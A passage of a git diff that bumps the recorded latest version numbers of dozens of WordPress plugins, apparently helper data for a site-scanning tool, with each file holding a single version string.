a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt index 261655b0c9..1645ac71e1 100644 --- a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt +++ b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt @@ -1 +1 @@ -7.17 \ No newline at end of file +7.20.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt index 19a7efe84f..51bd5ac4ed 100644 --- a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt +++ b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt @@ -1 +1 @@ -8.17 \ No newline at end of file +8.20.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index a6c4b4a24a..8aa0f2319d 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.4.10 \ No newline at end of file +2.5.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index 250205ed1c..2a662d546d 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.104.0 \ No newline at end of file +1.111.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-sitemap-generator.txt b/helpers/wordpress/plugins/google-sitemap-generator.txt index c79b1ba003..068399f864 100644 --- a/helpers/wordpress/plugins/google-sitemap-generator.txt +++ b/helpers/wordpress/plugins/google-sitemap-generator.txt @@ -1 +1 @@ -4.1.11 \ No newline at end of file +4.1.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gtranslate.txt b/helpers/wordpress/plugins/gtranslate.txt index 282895a8f8..b38ebbfce2 100644 --- a/helpers/wordpress/plugins/gtranslate.txt +++ b/helpers/wordpress/plugins/gtranslate.txt @@ -1 +1 @@ -3.0.3 \ No newline at end of file +3.0.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 11155dbeea..986f18a01d 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -16.1.0 \ No newline at end of file +16.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/header-footer-code-manager.txt b/helpers/wordpress/plugins/header-footer-code-manager.txt index 9b51125a6c..474ad5be60 100644 --- a/helpers/wordpress/plugins/header-footer-code-manager.txt +++ b/helpers/wordpress/plugins/header-footer-code-manager.txt @@ -1 +1 @@ -1.1.34 \ No newline at end of file +1.1.36 \ No newline at end of file diff --git a/helpers/wordpress/plugins/header-footer-elementor.txt b/helpers/wordpress/plugins/header-footer-elementor.txt index c68b3f29f9..ce2bef547f 100644 --- a/helpers/wordpress/plugins/header-footer-elementor.txt +++ b/helpers/wordpress/plugins/header-footer-elementor.txt @@ -1 +1 @@ -1.6.14 \ No newline at end of file +1.6.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/header-footer.txt b/helpers/wordpress/plugins/header-footer.txt index 448ada3bda..c4a602db6e 100644 --- a/helpers/wordpress/plugins/header-footer.txt +++ b/helpers/wordpress/plugins/header-footer.txt @@ -1 +1 @@ -3.2.5 \ No newline at end of file +3.2.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/health-check.txt b/helpers/wordpress/plugins/health-check.txt index ce6a70b9d8..9dbb0c0052 100644 --- a/helpers/wordpress/plugins/health-check.txt +++ b/helpers/wordpress/plugins/health-check.txt @@ -1 +1 @@ -1.6.0 \ No newline at end of file +1.7.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/host-webfonts-local.txt b/helpers/wordpress/plugins/host-webfonts-local.txt index 4cc0e35cb3..4b1e48ed97 100644 --- a/helpers/wordpress/plugins/host-webfonts-local.txt +++ b/helpers/wordpress/plugins/host-webfonts-local.txt @@ -1 +1 @@ -5.6.0 \ No newline at end of file +5.7.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/imagify.txt b/helpers/wordpress/plugins/imagify.txt index 7c32728738..8f9174b4dd 100644 --- a/helpers/wordpress/plugins/imagify.txt +++ b/helpers/wordpress/plugins/imagify.txt @@ -1 +1 @@ -2.1.1 \ No newline at end of file +2.1.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/imsanity.txt b/helpers/wordpress/plugins/imsanity.txt index cae9add96b..642c63c424 100644 --- a/helpers/wordpress/plugins/imsanity.txt +++ b/helpers/wordpress/plugins/imsanity.txt @@ -1 +1 @@ -2.8.2 \ No newline at end of file +2.8.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/insert-headers-and-footers.txt b/helpers/wordpress/plugins/insert-headers-and-footers.txt index 476ede462b..626c707d2f 100644 --- a/helpers/wordpress/plugins/insert-headers-and-footers.txt +++ b/helpers/wordpress/plugins/insert-headers-and-footers.txt @@ -1 +1 @@ -2.0.13 \ No newline at end of file +2.1.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack-boost.txt b/helpers/wordpress/plugins/jetpack-boost.txt new file mode 100644 index 0000000000..7c32728738 --- /dev/null +++ b/helpers/wordpress/plugins/jetpack-boost.txt @@ -0,0 +1 @@ +2.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt index e597143d87..898a66dfbd 100644 --- a/helpers/wordpress/plugins/jetpack.txt +++ b/helpers/wordpress/plugins/jetpack.txt @@ -1 +1 @@ -12.2.1 \ No newline at end of file +12.7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index a254f0ac2c..c745147036 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.0.41 \ No newline at end of file +3.1.22 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kirki.txt b/helpers/wordpress/plugins/kirki.txt index ef8d7569d6..28cbf7c0aa 100644 --- a/helpers/wordpress/plugins/kirki.txt +++ b/helpers/wordpress/plugins/kirki.txt @@ -1 +1 @@ -4.2.0 \ No newline at end of file +5.0.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/leadin.txt b/helpers/wordpress/plugins/leadin.txt index 3607f90e0b..0fc9c3b704 100644 --- a/helpers/wordpress/plugins/leadin.txt +++ b/helpers/wordpress/plugins/leadin.txt @@ -1 +1 @@ -10.1.24 \ No newline at end of file +10.2.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt index e02c07f215..a244f263f3 100644 --- a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt +++ b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt @@ -1 +1 @@ -2.25.20 \ No newline at end of file +2.25.25 \ No newline at end of file diff --git a/helpers/wordpress/plugins/litespeed-cache.txt b/helpers/wordpress/plugins/litespeed-cache.txt index e5e7441d3e..59437b9791 100644 --- a/helpers/wordpress/plugins/litespeed-cache.txt +++ b/helpers/wordpress/plugins/litespeed-cache.txt @@ -1 +1 @@ -5.5 \ No newline at end of file +5.7.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loco-translate.txt b/helpers/wordpress/plugins/loco-translate.txt index e46a05b196..952f449f1f 100644 --- a/helpers/wordpress/plugins/loco-translate.txt +++ b/helpers/wordpress/plugins/loco-translate.txt @@ -1 +1 @@ -2.6.4 \ No newline at end of file +2.6.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loginizer.txt b/helpers/wordpress/plugins/loginizer.txt index cb1ad9b47f..b9268dae24 100644 --- a/helpers/wordpress/plugins/loginizer.txt +++ b/helpers/wordpress/plugins/loginizer.txt @@ -1 +1 @@ -1.7.9 \ No newline at end of file +1.8.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailchimp-for-wp.txt b/helpers/wordpress/plugins/mailchimp-for-wp.txt index efd4ffcab8..8691a0a713 100644 --- a/helpers/wordpress/plugins/mailchimp-for-wp.txt +++ b/helpers/wordpress/plugins/mailchimp-for-wp.txt @@ -1 +1 @@ -4.9.5 \ No newline at end of file +4.9.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index a7752bacf1..47a16f5755 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.20.0 \ No newline at end of file +4.34.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/maintenance.txt b/helpers/wordpress/plugins/maintenance.txt index 109b44a452..497104f620 100644 --- a/helpers/wordpress/plugins/maintenance.txt +++ b/helpers/wordpress/plugins/maintenance.txt @@ -1 +1 @@ -4.07 \ No newline at end of file +4.08 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mainwp-child.txt b/helpers/wordpress/plugins/mainwp-child.txt index 1c3d5b4c23..689f7fbd33 100644 --- a/helpers/wordpress/plugins/mainwp-child.txt +++ b/helpers/wordpress/plugins/mainwp-child.txt @@ -1 +1 @@ -4.4.1.3 \ No newline at end of file +4.5.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/malcare-security.txt b/helpers/wordpress/plugins/malcare-security.txt index 65d265c76a..50c97d61b5 100644 --- a/helpers/wordpress/plugins/malcare-security.txt +++ b/helpers/wordpress/plugins/malcare-security.txt @@ -1 +1 @@ -5.09 \ No newline at end of file +5.25 \ No newline at end of file diff --git a/helpers/wordpress/plugins/megamenu.txt b/helpers/wordpress/plugins/megamenu.txt index acf9bf09db..9b7a431d9f 100644 --- a/helpers/wordpress/plugins/megamenu.txt +++ b/helpers/wordpress/plugins/megamenu.txt @@ -1 +1 @@ -3.2.2 \ No newline at end of file +3.2.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/members.txt b/helpers/wordpress/plugins/members.txt index 448ada3bda..132d9f7707 100644 --- a/helpers/wordpress/plugins/members.txt +++ b/helpers/wordpress/plugins/members.txt @@ -1 +1 @@ -3.2.5 \ No newline at end of file +3.2.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt index 23900d674d..182ea559ba 100644 --- a/helpers/wordpress/plugins/meta-box.txt +++ b/helpers/wordpress/plugins/meta-box.txt @@ -1 +1 @@ -5.7.3 \ No newline at end of file +5.8.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt index 40fc72677c..6de2c86be0 100644 --- a/helpers/wordpress/plugins/ml-slider.txt +++ b/helpers/wordpress/plugins/ml-slider.txt @@ -1 +1 @@ -3.32.0 \ No newline at end of file +3.40.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt index b3956576d7..608c4e7100 100644 --- a/helpers/wordpress/plugins/newsletter.txt +++ b/helpers/wordpress/plugins/newsletter.txt @@ -1 +1 @@ -7.8.8 \ No newline at end of file +8.0.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/nextend-facebook-connect.txt b/helpers/wordpress/plugins/nextend-facebook-connect.txt index 7d8ebf9eef..edcc0e556c 100644 --- a/helpers/wordpress/plugins/nextend-facebook-connect.txt +++ b/helpers/wordpress/plugins/nextend-facebook-connect.txt @@ -1 +1 @@ -3.1.9 \ No newline at end of file +3.1.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/nextgen-gallery.txt b/helpers/wordpress/plugins/nextgen-gallery.txt index cad5350a41..f2fe478687 100644 --- a/helpers/wordpress/plugins/nextgen-gallery.txt +++ b/helpers/wordpress/plugins/nextgen-gallery.txt @@ -1 +1 @@ -3.36 \ No newline at end of file +3.41 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt index 47b080dc85..37b70a979d 100644 --- a/helpers/wordpress/plugins/ninja-forms.txt +++ b/helpers/wordpress/plugins/ninja-forms.txt @@ -1 +1 @@ -3.6.25 \ No newline at end of file +3.6.34 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ocean-extra.txt b/helpers/wordpress/plugins/ocean-extra.txt index 9671f9a9bd..fae692e41d 100644 --- a/helpers/wordpress/plugins/ocean-extra.txt +++ b/helpers/wordpress/plugins/ocean-extra.txt @@ -1 +1 @@ -2.1.7 \ No newline at end of file +2.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/official-facebook-pixel.txt b/helpers/wordpress/plugins/official-facebook-pixel.txt index d003324bf6..9c25f93c64 100644 --- a/helpers/wordpress/plugins/official-facebook-pixel.txt +++ b/helpers/wordpress/plugins/official-facebook-pixel.txt @@ -1 +1 @@ -3.0.12 \ No newline at end of file +3.0.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/optinmonster.txt b/helpers/wordpress/plugins/optinmonster.txt index 3a36fc04c0..2ad1684ea1 100644 --- a/helpers/wordpress/plugins/optinmonster.txt +++ b/helpers/wordpress/plugins/optinmonster.txt @@ -1 +1 @@ -2.13.5 \ No newline at end of file +2.14.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/password-protected.txt b/helpers/wordpress/plugins/password-protected.txt index 06cf1864bb..68167133b9 100644 --- a/helpers/wordpress/plugins/password-protected.txt +++ b/helpers/wordpress/plugins/password-protected.txt @@ -1 +1 @@ -2.6.3.1 \ No newline at end of file +2.6.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/photo-gallery.txt b/helpers/wordpress/plugins/photo-gallery.txt index 084129ed17..bbaa9e1622 100644 --- a/helpers/wordpress/plugins/photo-gallery.txt +++ b/helpers/wordpress/plugins/photo-gallery.txt @@ -1 +1 @@ -1.8.16 \ No newline at end of file +1.8.18 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pinterest-for-woocommerce.txt b/helpers/wordpress/plugins/pinterest-for-woocommerce.txt new file mode 100644 index 0000000000..ba50e863a3 --- /dev/null +++ b/helpers/wordpress/plugins/pinterest-for-woocommerce.txt @@ -0,0 +1 @@ +1.3.12 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index 8824b7e7f5..379a5d7428 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.3.9 \ No newline at end of file +9.4.7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/polylang.txt b/helpers/wordpress/plugins/polylang.txt index 8a0feb98ca..80d13b7d9b 100644 --- a/helpers/wordpress/plugins/polylang.txt +++ b/helpers/wordpress/plugins/polylang.txt @@ -1 +1 @@ -3.4.3 \ No newline at end of file +3.5.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/popup-builder.txt b/helpers/wordpress/plugins/popup-builder.txt index ed9a86f5ce..ef8d7569d6 100644 --- a/helpers/wordpress/plugins/popup-builder.txt +++ b/helpers/wordpress/plugins/popup-builder.txt @@ -1 +1 @@ -4.1.14 \ No newline at end of file +4.2.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index 6de6d05565..9aa34646dc 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.5.7 \ No newline at end of file +2.7.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-types-order.txt b/helpers/wordpress/plugins/post-types-order.txt index ed35d09262..42f7d2336e 100644 --- a/helpers/wordpress/plugins/post-types-order.txt +++ b/helpers/wordpress/plugins/post-types-order.txt @@ -1 +1 @@ -2.0.9 \ No newline at end of file +2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index 58426c1034..c094c33309 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.10.1 \ No newline at end of file +4.10.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pretty-link.txt b/helpers/wordpress/plugins/pretty-link.txt index a423d4217b..678fd88a33 100644 --- a/helpers/wordpress/plugins/pretty-link.txt +++ b/helpers/wordpress/plugins/pretty-link.txt @@ -1 +1 @@ -3.4.2 \ No newline at end of file +3.5.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/really-simple-ssl.txt b/helpers/wordpress/plugins/really-simple-ssl.txt index c60ebc1807..ad955e95b4 100644 --- a/helpers/wordpress/plugins/really-simple-ssl.txt +++ b/helpers/wordpress/plugins/really-simple-ssl.txt @@ -1 +1 @@ -7.0.5 \ No newline at end of file +7.1.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/redux-framework.txt b/helpers/wordpress/plugins/redux-framework.txt index f15ec04e09..e49188cba0 100644 --- a/helpers/wordpress/plugins/redux-framework.txt +++ b/helpers/wordpress/plugins/redux-framework.txt @@ -1 +1 @@ -4.4.4 \ No newline at end of file +4.4.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/regenerate-thumbnails.txt b/helpers/wordpress/plugins/regenerate-thumbnails.txt index 97ceee1b9f..8a4b2758ef 100644 --- a/helpers/wordpress/plugins/regenerate-thumbnails.txt +++ b/helpers/wordpress/plugins/regenerate-thumbnails.txt @@ -1 +1 @@ -3.1.5 \ No newline at end of file +3.1.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/safe-svg.txt b/helpers/wordpress/plugins/safe-svg.txt index 7c32728738..fae692e41d 100644 --- a/helpers/wordpress/plugins/safe-svg.txt +++ b/helpers/wordpress/plugins/safe-svg.txt @@ -1 +1 @@ -2.1.1 \ No newline at end of file +2.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index 6cf4d627b1..9c75eed6ff 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.118 \ No newline at end of file +1.0.204 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt index c6db724bfd..a263a9c3a2 100644 --- a/helpers/wordpress/plugins/sg-cachepress.txt +++ b/helpers/wordpress/plugins/sg-cachepress.txt @@ -1 +1 @@ -7.3.3 \ No newline at end of file +7.4.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-security.txt b/helpers/wordpress/plugins/sg-security.txt index 03e5161d2c..b000a6a063 100644 --- a/helpers/wordpress/plugins/sg-security.txt +++ b/helpers/wordpress/plugins/sg-security.txt @@ -1 +1 @@ -1.4.5 \ No newline at end of file +1.4.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/shortcodes-ultimate.txt b/helpers/wordpress/plugins/shortcodes-ultimate.txt index 47c78569cc..0b17707f79 100644 --- a/helpers/wordpress/plugins/shortcodes-ultimate.txt +++ b/helpers/wordpress/plugins/shortcodes-ultimate.txt @@ -1 +1 @@ -5.13.1 \ No newline at end of file +5.13.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt index e230c8396d..b5db1702f3 100644 --- a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt +++ b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt @@ -1 +1 @@ -5.3.0 \ No newline at end of file +5.4.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/simple-custom-post-order.txt b/helpers/wordpress/plugins/simple-custom-post-order.txt index 1b03fe63dd..6de6d05565 100644 --- a/helpers/wordpress/plugins/simple-custom-post-order.txt +++ b/helpers/wordpress/plugins/simple-custom-post-order.txt @@ -1 +1 @@ -2.5.6 \ No newline at end of file +2.5.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/siteguard.txt b/helpers/wordpress/plugins/siteguard.txt index 5849151fd3..d263485165 100644 --- a/helpers/wordpress/plugins/siteguard.txt +++ b/helpers/wordpress/plugins/siteguard.txt @@ -1 +1 @@ -1.7.5 \ No newline at end of file +1.7.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/siteorigin-panels.txt b/helpers/wordpress/plugins/siteorigin-panels.txt index f8f895c6aa..cd74b3e810 100644 --- a/helpers/wordpress/plugins/siteorigin-panels.txt +++ b/helpers/wordpress/plugins/siteorigin-panels.txt @@ -1 +1 @@ -2.24.0 \ No newline at end of file +2.26.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/smart-slider-3.txt b/helpers/wordpress/plugins/smart-slider-3.txt index 7858b9c11e..31f6d3b788 100644 --- a/helpers/wordpress/plugins/smart-slider-3.txt +++ b/helpers/wordpress/plugins/smart-slider-3.txt @@ -1 +1 @@ -3.5.1.17 \ No newline at end of file +3.5.1.19 \ No newline at end of file diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt index daf515c92d..c36071a4ac 100644 --- a/helpers/wordpress/plugins/so-widgets-bundle.txt +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -1 +1 @@ -1.50.1 \ No newline at end of file +1.55.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt b/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt index 95f95ffec5..5eeb3f978c 100644 --- a/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt +++ b/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt @@ -1 +1 @@ -9.0.16 \ No newline at end of file +9.0.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/table-of-contents-plus.txt b/helpers/wordpress/plugins/table-of-contents-plus.txt index 1610a30cb2..0b39e14dfa 100644 --- a/helpers/wordpress/plugins/table-of-contents-plus.txt +++ b/helpers/wordpress/plugins/table-of-contents-plus.txt @@ -1 +1 @@ -2302 \ No newline at end of file +2309 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index c346e7a049..b370e25daa 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.1.4 \ No newline at end of file +2.1.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/taxonomy-terms-order.txt b/helpers/wordpress/plugins/taxonomy-terms-order.txt index 73c8b4f99c..cb1ad9b47f 100644 --- a/helpers/wordpress/plugins/taxonomy-terms-order.txt +++ b/helpers/wordpress/plugins/taxonomy-terms-order.txt @@ -1 +1 @@ -1.7.7 \ No newline at end of file +1.7.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt index 9734e120ae..31b44b032b 100644 --- a/helpers/wordpress/plugins/the-events-calendar.txt +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -1 +1 @@ -6.1.2.2 \ No newline at end of file +6.2.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tinymce-advanced.txt b/helpers/wordpress/plugins/tinymce-advanced.txt index cf51361190..2151dbda1e 100644 --- a/helpers/wordpress/plugins/tinymce-advanced.txt +++ b/helpers/wordpress/plugins/tinymce-advanced.txt @@ -1 +1 @@ -5.9.0 \ No newline at end of file +5.9.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/translatepress-multilingual.txt b/helpers/wordpress/plugins/translatepress-multilingual.txt index 1b03fe63dd..e46a05b196 100644 --- a/helpers/wordpress/plugins/translatepress-multilingual.txt +++ b/helpers/wordpress/plugins/translatepress-multilingual.txt @@ -1 +1 @@ -2.5.6 \ No newline at end of file +2.6.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index e0e1b4687c..f3ac133c54 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.6.9 \ No newline at end of file +2.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/updraftplus.txt b/helpers/wordpress/plugins/updraftplus.txt index fa994bd719..3339f04678 100644 --- a/helpers/wordpress/plugins/updraftplus.txt +++ b/helpers/wordpress/plugins/updraftplus.txt @@ -1 +1 @@ -1.23.6 \ No newline at end of file +1.23.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/use-any-font.txt b/helpers/wordpress/plugins/use-any-font.txt index c103f5094e..8bba0a73d2 100644 --- a/helpers/wordpress/plugins/use-any-font.txt +++ b/helpers/wordpress/plugins/use-any-font.txt @@ -1 +1 @@ -6.3.01 \ No newline at end of file +6.3.04 \ No newline at end of file diff --git a/helpers/wordpress/plugins/user-role-editor.txt b/helpers/wordpress/plugins/user-role-editor.txt index d79ba217cc..c79228dd9a 100644 --- a/helpers/wordpress/plugins/user-role-editor.txt +++ b/helpers/wordpress/plugins/user-role-editor.txt @@ -1 +1 @@ -4.63.3 \ No newline at end of file +4.64.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/w3-total-cache.txt b/helpers/wordpress/plugins/w3-total-cache.txt index 45674f16a8..fad066f801 100644 --- a/helpers/wordpress/plugins/w3-total-cache.txt +++ b/helpers/wordpress/plugins/w3-total-cache.txt @@ -1 +1 @@ -2.3.3 \ No newline at end of file +2.5.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 2151dbda1e..725dcb1728 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.9.2 \ No newline at end of file +5.11.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt index abb1658232..ee672d89ab 100644 --- a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt +++ b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt @@ -1 +1 @@ -1.9.0 \ No newline at end of file +1.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt index 6b0e58e78f..bbd8e9206e 100644 --- a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt +++ b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt @@ -1 +1 @@ -7.4.1 \ No newline at end of file +7.6.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 132c6def58..3eae443131 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -6.1.1 \ No newline at end of file +6.6.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt index 50aea0e7ab..a6254504e4 100644 --- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt @@ -1 +1 @@ -2.1.0 \ No newline at end of file +2.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt index 01081dbb9f..5cdb444f3d 100644 --- a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt +++ b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt @@ -1 +1 @@ -3.5.6 \ No newline at end of file +3.7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt index ecf00d9019..51bd85577a 100644 --- a/helpers/wordpress/plugins/woocommerce-services.txt +++ b/helpers/wordpress/plugins/woocommerce-services.txt @@ -1 +1 @@ -2.2.5 \ No newline at end of file +2.3.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index a33192706f..797ed2e270 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -7.8.2 \ No newline at end of file +8.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordfence.txt b/helpers/wordpress/plugins/wordfence.txt index 9c51f30944..131c693477 100644 --- a/helpers/wordpress/plugins/wordfence.txt +++ b/helpers/wordpress/plugins/wordfence.txt @@ -1 +1 @@ -7.10.0 \ No newline at end of file +7.10.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordpress-seo.txt b/helpers/wordpress/plugins/wordpress-seo.txt index 89e0c3dba3..102f0b362d 100644 --- a/helpers/wordpress/plugins/wordpress-seo.txt +++ b/helpers/wordpress/plugins/wordpress-seo.txt @@ -1 +1 @@ -20.10 \ No newline at end of file +21.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-fastest-cache.txt b/helpers/wordpress/plugins/wp-fastest-cache.txt index a5ba932511..867e52437a 100644 --- a/helpers/wordpress/plugins/wp-fastest-cache.txt +++ 